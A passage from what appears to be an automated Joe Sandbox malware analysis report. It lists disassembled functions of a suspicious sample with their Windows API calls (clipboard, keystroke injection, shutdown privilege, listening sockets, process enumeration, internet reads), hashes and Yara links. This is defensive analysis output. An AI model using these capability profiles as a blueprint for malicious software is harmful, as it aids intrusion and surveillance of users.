                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                            • String ID:
                            • API String ID: 1240663315-0
                            • Opcode ID: 49b4e92e2c74b1fc7e219b02532a753c31cf658591f2b42339ab92015ca432fb
                            • Instruction ID: fa9379d72e4ab31e98a9bdc5bcc6e8a476acd9d8cb88901a27695e3a8c1823a7
                            • Opcode Fuzzy Hash: 49b4e92e2c74b1fc7e219b02532a753c31cf658591f2b42339ab92015ca432fb
                            • Instruction Fuzzy Hash: 98E14D71204210AFCB15EF25C895E6ABBE9FF89314F04856DF48ADB2A2DB31ED41CB51
                            Function 000D7294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                            • String ID:
                            • API String ID: 1737998785-0
                            • Opcode ID: db4ae80bed8be6dec74a3556eb009fbf982f18e7ce081001d99b05ff75c037ff
                            • Instruction ID: 22877c649612ae4362cd2e60dd6c3f67bb78173fd0acdf22cfabe1951d88ead9
                            • Opcode Fuzzy Hash: db4ae80bed8be6dec74a3556eb009fbf982f18e7ce081001d99b05ff75c037ff
                            • Instruction Fuzzy Hash: C721C731204210AFDB14AFA5EC49F6D77E8EF44720F00801AF949DB662EBB1ED81DB95
                            Function 000DC604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000BA857: CLSIDFromProgID.OLE32 ref: 000BA874
                              • Part of subcall function 000BA857: ProgIDFromCLSID.OLE32(?,00000000), ref: 000BA88F
                              • Part of subcall function 000BA857: lstrcmpiW.KERNEL32(?,00000000), ref: 000BA89D
                              • Part of subcall function 000BA857: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 000BA8AD
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 000DC6AD
                            • _memset.LIBCMT ref: 000DC6BA
                            • _memset.LIBCMT ref: 000DC7D8
                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 000DC804
                            • CoTaskMemFree.OLE32(?), ref: 000DC80F
                            Strings
                            • NULL Pointer assignment, xrefs: 000DC85D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                            • String ID: NULL Pointer assignment
                            • API String ID: 1300414916-2785691316
                            • Opcode ID: 24fdd4e700d8e3d86239e7eb70b7369b09c671c0cb01f8ce1116f15344756f5f
                            • Instruction ID: 4ff25f3b0e962c8fbd8f0a81133630fa4fcf6d667aa43ec7d86996eeb767f0a9
                            • Opcode Fuzzy Hash: 24fdd4e700d8e3d86239e7eb70b7369b09c671c0cb01f8ce1116f15344756f5f
                            • Instruction Fuzzy Hash: FC911871D00219AFEB10DFA4DC85EDEBBB9BF09710F20416AF519A7291DB705A45CFA0
                            Function 000D24A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 000D24F6
                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 000D2526
                            • _wcscmp.LIBCMT ref: 000D253A
                            • _wcscmp.LIBCMT ref: 000D2555
                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 000D25F3
                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 000D2609
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                            • String ID: *.*
                            • API String ID: 713712311-438819550
                            • Opcode ID: 005713fb6b180f4decbdeab512d5e49a5e373f1a8ccf0feae5c572f1204b03c9
                            • Instruction ID: 78a971cff9f00b93d94568342964a346f33b18dcf7a11db286d0a8400c7f80a1
                            • Opcode Fuzzy Hash: 005713fb6b180f4decbdeab512d5e49a5e373f1a8ccf0feae5c572f1204b03c9
                            • Instruction Fuzzy Hash: F7416A7190431AAFCF54EFA4DC59AEEBBB4FF19310F104456F855A2291EB709A84CFA0
                            Function 00088CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                            • API String ID: 0-1546025612
                            • Opcode ID: 6c33f937744cff8218988c8e3583c07e75ca0a26d773f47490d59373a0f371af
                            • Instruction ID: 0bc624dffd78929a0a7058908ba471a4caa1c054ddcf15ff45c321ad61750236
                            • Opcode Fuzzy Hash: 6c33f937744cff8218988c8e3583c07e75ca0a26d773f47490d59373a0f371af
                            • Instruction Fuzzy Hash: 03926F75E0021ACBDF34EF58C8547BDB7B1BB54314F2882AAE896A7281D7709D81CF91
                            Function 00088530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: ad7790bc5b57a138c23f0a76f0b1f2103301826bf7e48854a618402097cba735
                            • Instruction ID: 21b6aa3ba585b3b37b7976425824e715c9be82988519563bdf7c7f76758fe66b
                            • Opcode Fuzzy Hash: ad7790bc5b57a138c23f0a76f0b1f2103301826bf7e48854a618402097cba735
                            • Instruction Fuzzy Hash: 70128970A00609DFDF14EFA4D981AEEB3F5FF48300F608569E846E7651EB35A960CB64
                            Function 000C82D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000BBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000BBF0F
                              • Part of subcall function 000BBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000BBF3C
                              • Part of subcall function 000BBEC3: GetLastError.KERNEL32 ref: 000BBF49
                            • ExitWindowsEx.USER32(?,00000000), ref: 000C830C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                            • String ID: $@$SeShutdownPrivilege
                            • API String ID: 2234035333-194228
                            • Opcode ID: 2e03c8d2de99260eb3ab98f96749539361589578ebf4f8f542d2f59765a1b7cb
                            • Instruction ID: 7ff6c82e6b45625bfaee2eecceed88e885710e7b0f63384c302b9131962e4f26
                            • Opcode Fuzzy Hash: 2e03c8d2de99260eb3ab98f96749539361589578ebf4f8f542d2f59765a1b7cb
                            • Instruction Fuzzy Hash: D5018471644351ABE7B817B89C4AFFF7698DB00B80F14582CF953E11D2DEA09D0182A8
                            Function 000D91DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                            Download Yara Rule
                            APIs
                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 000D9235
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D9244
                            • bind.WSOCK32(00000000,?,00000010), ref: 000D9260
                            • listen.WSOCK32(00000000,00000005), ref: 000D926F
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D9289
                            • closesocket.WSOCK32(00000000,00000000), ref: 000D929D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorLast$bindclosesocketlistensocket
                            • String ID:
                            • API String ID: 1279440585-0
                            • Opcode ID: 89d5c2265d64e3272ad1f9a49b37e65b7c2953d1f3512c152119fa76e1712db2
                            • Instruction ID: 7ebf571a318b365bcacbc802f2ad116c647427402fc7537d1c14e9d0efefcd41
                            • Opcode Fuzzy Hash: 89d5c2265d64e3272ad1f9a49b37e65b7c2953d1f3512c152119fa76e1712db2
                            • Instruction Fuzzy Hash: FE219135600600AFCB10EF64DC85BBE77F9AF44324F11815AF996A7792C770AD41DB61
                            Function 000C6F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 000C6F7D
                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 000C6F8D
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 000C6FAC
                            • __wsplitpath.LIBCMT ref: 000C6FD0
                            • _wcscat.LIBCMT ref: 000C6FE3
                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 000C7022
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                            • String ID:
                            • API String ID: 1605983538-0
                            • Opcode ID: ce52a1331a87e6548cf89462653762c704701510b621b7358abe2e8fad5c8300
                            • Instruction ID: 47ec4cc5841043f4a52bdc9bbc0c963e770159636cb64ecd58045a01bff10499
                            • Opcode Fuzzy Hash: ce52a1331a87e6548cf89462653762c704701510b621b7358abe2e8fad5c8300
                            • Instruction Fuzzy Hash: E4215371904219EBDB21ABA4DC88FEEB7FCAB49300F5004A9E549E3141EB759F84DF60
                            Function 0008A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000A010A: std::exception::exception.LIBCMT ref: 000A013E
                              • Part of subcall function 000A010A: __CxxThrowException@8.LIBCMT ref: 000A0153
                            • _memmove.LIBCMT ref: 000F3020
                            • _memmove.LIBCMT ref: 000F3135
                            • _memmove.LIBCMT ref: 000F31DC
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                            • String ID:
                            • API String ID: 1300846289-0
                            • Opcode ID: 6e4a3e7d891f4f18843c590d61659ec02f86d4526a1253a92d500d97dd1c97dc
                            • Instruction ID: 78983eeb875cd746e1e9e3ebfd9c8f60e35ae295d5b083c731f270c41c4bad8f
                            • Opcode Fuzzy Hash: 6e4a3e7d891f4f18843c590d61659ec02f86d4526a1253a92d500d97dd1c97dc
                            • Instruction Fuzzy Hash: 3302BE70A00209DBDF14EF68C881ABEB7F5FF49300F14806AE846DB256EB35DA51DB91
                            Function 000D96E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000DACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 000DACF5
                            • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 000D973D
                            • WSAGetLastError.WSOCK32(00000000,00000000), ref: 000D9760
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorLastinet_addrsocket
                            • String ID:
                            • API String ID: 4170576061-0
                            • Opcode ID: f433843a2d2cdb2182acc1c9d32634ce422b212c772f26e3672d1a6219c66fc8
                            • Instruction ID: 8e7bfd924c18a04ee8044ce526343e6044ef2031be6a824657152ee362190ea0
                            • Opcode Fuzzy Hash: f433843a2d2cdb2182acc1c9d32634ce422b212c772f26e3672d1a6219c66fc8
                            • Instruction Fuzzy Hash: 4241C271600200AFDF10AF64CC82EAE77EDEF48728F158059F956AB393DB74AD019B91
                            Function 000CF350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 000CF37A
                            • _wcscmp.LIBCMT ref: 000CF3AA
                            • _wcscmp.LIBCMT ref: 000CF3BF
                            • FindNextFileW.KERNEL32(00000000,?), ref: 000CF3D0
                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 000CF3FE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Find$File_wcscmp$CloseFirstNext
                            • String ID:
                            • API String ID: 2387731787-0
                            • Opcode ID: b72169fa6f146fe210ff7df8fca330ffbf82dd7b29a0a4b5301150ad7af7c476
                            • Instruction ID: 7b6c57fe757510bd9877d7124bfcfc78acd9955eb85c43579221ba77d5a82f7b
                            • Opcode Fuzzy Hash: b72169fa6f146fe210ff7df8fca330ffbf82dd7b29a0a4b5301150ad7af7c476
                            • Instruction Fuzzy Hash: BD41BF356047029FCB18DF68C490EAAB3E9FF49324F10416DE95ACB3A2DB71B945CB91
                            Function 000E20F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll,?,000E20EC,?,000E22E0), ref: 000E2104
                            • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 000E2116
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetProcessId$kernel32.dll
                            • API String ID: 2574300362-399901964
                            • Opcode ID: a6cc7ba2b64f6d36aa04bac2ac029bfecaa601d16348b10e0d13f3d569e6574c
                            • Instruction ID: f1e892f22020b2f4687cd230d8d2236baed5e9b954f75ed355194c8c9d756245
                            • Opcode Fuzzy Hash: a6cc7ba2b64f6d36aa04bac2ac029bfecaa601d16348b10e0d13f3d569e6574c
                            • Instruction Fuzzy Hash: 93D0A7345003528FD7206FA1F80D60276D8AB14310F004469E789E1554DBB4C4C0CA10
                            Function 000C4342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 000C439C
                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 000C43B8
                            • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 000C4425
                            • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 000C4483
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: KeyboardState$InputMessagePostSend
                            • String ID:
                            • API String ID: 432972143-0
                            • Opcode ID: 275dd03e6bd1dad0b031a7c98f9bd0b5e0fd285f4cee5a181d9ff11c8f222815
                            • Instruction ID: df87d63fd1355f3a0f148c62ed9ca40fe830363b7faa60d1e82d9797d0f9018f
                            • Opcode Fuzzy Hash: 275dd03e6bd1dad0b031a7c98f9bd0b5e0fd285f4cee5a181d9ff11c8f222815
                            • Instruction Fuzzy Hash: 234105B0A00248AAEF789B659828FFDBBF5BB45311F14415EF581932C2CBB48E85D761
                            Function 000C220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 000C221E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: lstrlen
                            • String ID: ($|
                            • API String ID: 1659193697-1631851259
                            • Opcode ID: 62f31151d0ec5717eab735824e9d6211ec96249b35550c406027fa84bddce76f
                            • Instruction ID: 0953ba1259f4eef0f6b8eea85fb1ec6f1d8e8fcaa072ab24e0c166c8e0820612
                            • Opcode Fuzzy Hash: 62f31151d0ec5717eab735824e9d6211ec96249b35550c406027fa84bddce76f
                            • Instruction Fuzzy Hash: E2322575A006059FC728DF69C480EAAB7F0FF48320B15C56EE49ADB7A2D770E981CB54
                            Function 0009AD5C Relevance: 4.9, APIs: 3, Instructions: 378COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0009AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0009AF8E
                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 0009AE5E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: LongProcWindow
                            • String ID:
                            • API String ID: 3265722593-0
                            • Opcode ID: 8c8db47fae5734952966f3d621f4b418b1b25f65a553cc7a23f325576b8301a9
                            • Instruction ID: 6bab36eb2ae7936885aeb95c61d0b52ad6772b24386374dfaf9773b82f496e97
                            • Opcode Fuzzy Hash: 8c8db47fae5734952966f3d621f4b418b1b25f65a553cc7a23f325576b8301a9
                            • Instruction Fuzzy Hash: C4A139A430424ABEDF78AB294C98DBF399CDF83751B104539F502E65A2CA259D41F2F3
                            Function 000D550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                            Download Yara Rule
                            APIs
                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,000D4A1E,00000000), ref: 000D55FD
                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 000D5629
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Internet$AvailableDataFileQueryRead
                            • String ID:
                            • API String ID: 599397726-0
                            • Opcode ID: e9901c582313ccc486ac94d0a8a9ccb964599b421842c67028cfcbd08dcf1ff3
                            • Instruction ID: 62704a7da11ca38b89eccad0f14a3158ab46d0f7071a502abd0a7a78fb7b7784
                            • Opcode Fuzzy Hash: e9901c582313ccc486ac94d0a8a9ccb964599b421842c67028cfcbd08dcf1ff3
                            • Instruction Fuzzy Hash: 9141C371500B09BFEB219A90DC95EBFB7FDEB40719F10401BFA0567281EAB09E419A74
                            Function 000CEA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
